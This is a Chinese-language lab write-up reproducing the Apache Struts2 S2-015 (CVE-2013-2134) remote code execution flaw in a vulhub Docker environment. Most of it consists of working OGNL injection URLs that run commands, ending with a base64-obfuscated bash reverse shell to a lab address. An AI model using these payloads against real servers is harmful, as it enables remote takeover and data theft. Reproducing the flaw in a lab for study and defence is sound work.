CVE-2013-2134 S2-015 远程代码执行漏洞

原创

用户8478947

发布于 2022-12-22 16:31:46

85600

代码可运行

文章被收录于专栏：安全学习

运行总次数：0

代码可运行

1 漏洞信息

漏洞名称	远程代码执行漏洞
漏洞编号	CVE-2013-2134
危害等级	高危
漏洞类型	中间件漏洞
漏洞厂商	Apache
漏洞组件	Struts2
受影响版本	2.0.0 <= Struts2 <= 2.3.15
漏洞概述	Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。远程攻击者可借助带有‘${}’和‘%{}’序列值（可导致判断OGNL代码两次）的请求，利用该漏洞执行任意OGNL代码。

2 环境搭建

2.1 环境概述

Linux操作系统

2.2 搭建过程

拉取镜像

 cd vulhub/struts2/s2-015
 docker-compose up -d

访问http://192.168.146.158:8015

3 漏洞复现

访问url，构造一个恶意的payload并发送。

 http://192.168.146.158:8015/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27echo%20has%20vul%27%29.getInputStream%28%29%29%2C%23q%7D.action
 
 payload原型：
 http://192.168.146.158:8015/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo has vul').getInputStream()),#q}.action

发现成功执行了echo has vul，说明存在该漏洞。

既然发现漏洞了，那我们可以构造一个payload，执行id命令。

 http://192.168.146.158:8015/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%2C%23q%7D.action
 
 payload原型：
 http://192.168.146.158:8015/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}.action

成功执行了id命令。

接下来开始反弹shell

 bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
 base加密
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}
 url编码
 bash+-c+%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D

访问漏洞url并且添加恶意payload进行抓包。

 http://192.168.146.158:8015/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27%29.getInputStream%28%29%29%2C%23q%7D.action
 
 payload原型：
 http://192.168.146.158:8015/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').getInputStream()),#q}.action